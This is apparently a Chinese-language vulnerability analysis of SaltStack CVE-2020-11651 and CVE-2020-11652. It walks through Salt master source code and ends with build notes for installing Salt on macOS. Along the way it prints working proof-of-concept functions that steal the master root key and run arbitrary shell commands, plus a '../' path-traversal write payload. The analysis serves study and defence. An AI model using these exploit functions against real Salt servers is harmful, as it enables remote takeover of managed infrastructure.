SaltStack是一种基于C/S架构的服务器基础架构集中管理平台,最近披露出存在两个安全漏洞 CVE-2020-11651 权限缺陷、CVE-2020-11652 任意文件读写漏洞,官方公告SALT 3000.2 RELEASE NOTES, 两个CVE漏洞可以造成远程命令执行。Ghost 使用SaltStack管理自身的机器,漏洞披露后被恶意入侵并植入挖矿程序,Ghost的安全公告
Critical vulnerability impacting all services
The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.
def get_rootkey(): try: response = clear_channel.send({'cmd':'_prep_auth_info'}, timeout=2) for i in response: if isinstance(i,dict) and len(i) == 1: rootkey = list(i.values())[0] print("Retrieved root key: " + rootkey) return rootkey return False except: return False
def master_shell(root_key,command): # This is achieved by using the stolen key to create a "runner" on the master node using the cmdmod module, then the cmd.exec_code function to run some python3 code that shells out. # There is a function but I wasn't able to get it to accept the "cmd" kwarg parameter for some reason. # It's also possible to use CVE-2020-11652 to get shell if the master instance is running as root by writing a crontab into a cron directory, or proably some other ways. # This way is nicer though, and doesn't need the master to be running as root . msg = {"key":root_key, "cmd":"runner", 'fun': 'salt.cmd', "kwarg":{ "fun":"cmd.exec_code", "lang":"python3", "code":"import subprocess;'{}',shell=True)".format(command) }, 'jid': '20200504042611133934', 'user': 'sudo_user', '_stamp': '2020-05-04T04:26:13.609688'} try: response = clear_channel.send(msg,timeout=3) print("Got response for attempting master shell: "+str(response)+ ". Looks promising!") return True except: print("something failed") return False
poc调用salt packages 分析
clear_channel = salt.transport.client.ReqChannel.factory(minion_config, crypt='clear') -> response = clear_channel.send({'cmd': '_prep_auth_info'}, timeout=2) /salt/transport/ @salt.ext.tornado.gen.coroutine def send(self, load, tries=3, timeout=60, raw=False): ''' Send a request, return a future which will complete when we send the message ''' if self.crypt == 'clear': ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout) else: ret = yield self._crypted_transfer(load, tries=tries, timeout=timeout, raw=raw) raise salt.ext.tornado.gen.Return(ret)
salt.transport.client.ReqChannel.factory 最后被实例化为AsyncZeroMQReqChannel,而且带有clear参数,即发给master的命令是clear没有AES加密的
SaltStack 逻辑非常复杂,只对涉及漏洞及其利用点的master端工作流程做简单梳理,可以结合SaltStack官方doc梳理
提交任务 -> ReqServer(TCP:PORT:4506) -> MWorker -> workers.ipc -> auth -> Publisher -> EventPulisher
根据官方描述 ClearFuncs class 没有正确校验调用的method,即发生在 woker认领任务并发送publish命令处,结合POC在salt packages的调用流程
salt/ class ReqServer(salt.utils.process.SignalHandlingProcess): def __bind(self):
salt/ class MWorker(salt.utils.process.SignalHandlingProcess): def __bind(self): """ Bind to the local port """ # using ZMQIOLoop since we *might* need zmq in there install_zmq() self.io_loop = ZMQDefaultLoop() self.io_loop.make_current() for req_channel in self.req_channels: req_channel.post_fork( self._handle_payload, io_loop=self.io_loop ) # TODO: cleaner? Maybe lazily? try: self.io_loop.start() except (KeyboardInterrupt, SystemExit): # Tornado knows what to do pass
salt/ req_channel.post_fork( self._handle_payload, io_loop=self.io_loop ) @salt.ext.tornado.gen.coroutine def _handle_payload(self, payload): """ The _handle_payload method is the key method used to figure out what needs to be done with communication to the server Example cleartext payload generated for 'salt myminion': {'enc': 'clear', 'load': {'arg': [], 'cmd': 'publish', 'fun': '', 'jid': '', 'key': 'alsdkjfa.,maljf-==adflkjadflkjalkjadfadflkajdflkj', 'kwargs': {'show_jid': False, 'show_timeout': False}, 'ret': '', 'tgt': 'myminion', 'tgt_type': 'glob', 'user': 'root'}} :param dict payload: The payload route to the appropriate handler """ key = payload["enc"] load = payload["load"] ret = {"aes": self._handle_aes, "clear": self._handle_clear}[key](load) raise salt.ext.tornado.gen.Return(ret)
通过post_fork()传入self._handler_payload 任务处理函数,在_handle_payload()方法中可以看由于poc的send 带有'enc': 'clear' 'cmd': '_prep_auth_info'
def _handle_clear(self, load): """ Process a cleartext command :param dict load: Cleartext payload :return: The result of passing the load to a function in ClearFuncs corresponding to the command specified in the load's 'cmd' key. """ log.trace("Clear payload received with command %s", load["cmd"]) cmd = load["cmd"] if cmd.startswith("__"): return False if self.opts["master_stats"]: start = time.time() self.stats[cmd]["runs"] += 1 ret = getattr(self.clear_funcs, cmd)(load), {"fun": "send_clear"} if self.opts["master_stats"]: self._post_stats(start, cmd) return ret
def _prep_auth_info(self, clear_load): sensitive_load_keys = [] key = None if "token" in clear_load: auth_type = "token" err_name = "TokenAuthenticationError" sensitive_load_keys = ["token"] elif "eauth" in clear_load: auth_type = "eauth" err_name = "EauthAuthenticationError" sensitive_load_keys = ["username", "password"] else: auth_type = "user" err_name = "UserAuthenticationError" key = self.key return auth_type, err_name, key, sensitive_load_keys
method = self.clear_funcs.get_method(cmd) ''' 'enc': 'clear' ''' class TransportMethods(object): """ Expose methods to the transport layer, methods with their names found in the class attribute 'expose_methods' will be exposed to the transport layer via 'get_method'. """ expose_methods = () def get_method(self, name): """ Get a method which should be exposed to the transport layer """ if name in self.expose_methods: try: return getattr(self, name) except AttributeError: log.error("Requested method not exposed: %s", name) else: log.error("Requested method not exposed: %s", name) ''' 'enc': 'aes' ''' class AESFuncs(TransportMethods): """ Set up functions that are available when the load is encrypted with AES """ expose_methods = ( "verify_minion", "_master_tops", "_ext_nodes", "_master_opts", "_mine_get", "_mine", "_mine_delete", "_mine_flush", "_file_recv", "_pillar", "_minion_event", "_handle_minion_event", "_return", "_syndic_return", "_minion_runner", "pub_ret", "minion_pub", "minion_publish", "revoke_auth", "run_func", "_serve_file", "_file_find", "_file_hash", "_file_find_and_stat", "_file_list", "_file_list_emptydirs", "_dir_list", "_symlink_list", "_file_envs", )
The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users.
SaltStack Test类 def test_clearfuncs_config(self): clear_channel = salt.transport.client.ReqChannel.factory( self.minion_config, crypt="clear" ) msg = { "key": self.key, "cmd": "wheel", "fun": "config.update_config", "file_name": "../evil", "yaml_contents": "win", } ret = clear_channel.send(msg, timeout=5) assert not os.path.exists( os.path.join(self.conf_dir, "evil.conf") ), "Wrote file via directory traversal"
msg = { 'key': root_key, 'cmd': 'wheel', 'fun': 'file_roots.write', 'path': '../../../../../../../../tmp/salt_CVE_2020_11652', 'data': 'evil', } ret = clear_channel.send(msg, timeout=5)
def write(data, path, saltenv="base", index=0): """ Write the named file, by default the first file found is written, but the index of the file can be specified to write to a lower priority file root """ if saltenv not in __opts__["file_roots"]: return "Named environment {0} is not present".format(saltenv) if len(__opts__["file_roots"][saltenv]) <= index: return "Specified index {0} in environment {1} is not present".format( index, saltenv ) if os.path.isabs(path): return ( "The path passed in {0} is not relative to the environment " "{1}" ).format(path, saltenv) dest = os.path.join(__opts__["file_roots"][saltenv][index], path)
使用os.path.isabs 判断是否是绝对路径,防止任意路径写入,但是被../绕过
def _realpath(path): """ Cross platform realpath method. On Windows when python 3, this method uses the os.readlink method to resolve any filesystem links. On Windows when python 2, this method is a no-op. All other platforms and version use os.path.realpath """ if salt.utils.platform.is_darwin(): return _realpath_darwin(path) elif salt.utils.platform.is_windows(): if salt.ext.six.PY3: return _realpath_windows(path) else: return path return os.path.realpath(path) def _realpath_darwin(path): base = "" for part in path.split(os.path.sep)[1:]: if base != "": if os.path.islink(os.path.sep.join([base, part])): base = os.readlink(os.path.sep.join([base, part])) else: base = os.path.abspath(os.path.sep.join([base, part])) else: base = os.path.abspath(os.path.sep.join([base, part])) return base
mac python3 -m pip install salt
ext-date-lib/timelib_structs.h:24:10: fatal error: 'timelib_config.h' file not found
#include "timelib_config.h"
1 error generated.
error: command 'clang' failed with exit status 1
python3 -m pip download timelib
setup(name="timelib", version="0.2.4", description="parse english textual date descriptions", author="Ralf Schmitt", author_email="[email protected]", url="", ext_modules=[Extension("timelib", sources=sources, libraries=libraries, include_dirs=[".", "ext-date-lib"], define_macros=[("HAVE_STRING_H", 1)])], include_dirs=[".", "ext-date-lib"], long_description=open("README.rst").read(), license="zlib/php", **extra)
python3 build
python3 install